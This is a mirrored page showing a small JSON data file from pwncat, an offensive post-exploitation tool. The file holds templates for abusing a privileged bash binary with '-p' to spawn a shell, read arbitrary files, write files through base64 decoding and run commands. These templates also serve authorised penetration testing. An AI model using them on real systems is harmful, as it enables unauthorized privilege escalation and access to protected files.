mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-24 09:35:39 +01:00
13 lines
252 B
JSON
13 lines
252 B
JSON
[
|
|
{
|
|
"name": "bash",
|
|
"shell": "{path} -p",
|
|
"read_file": "{path} -p -c \"cat {lfile}\"",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
|
|
},
|
|
"command": "{path} -p -c {command}"
|
|
}
|
|
]
|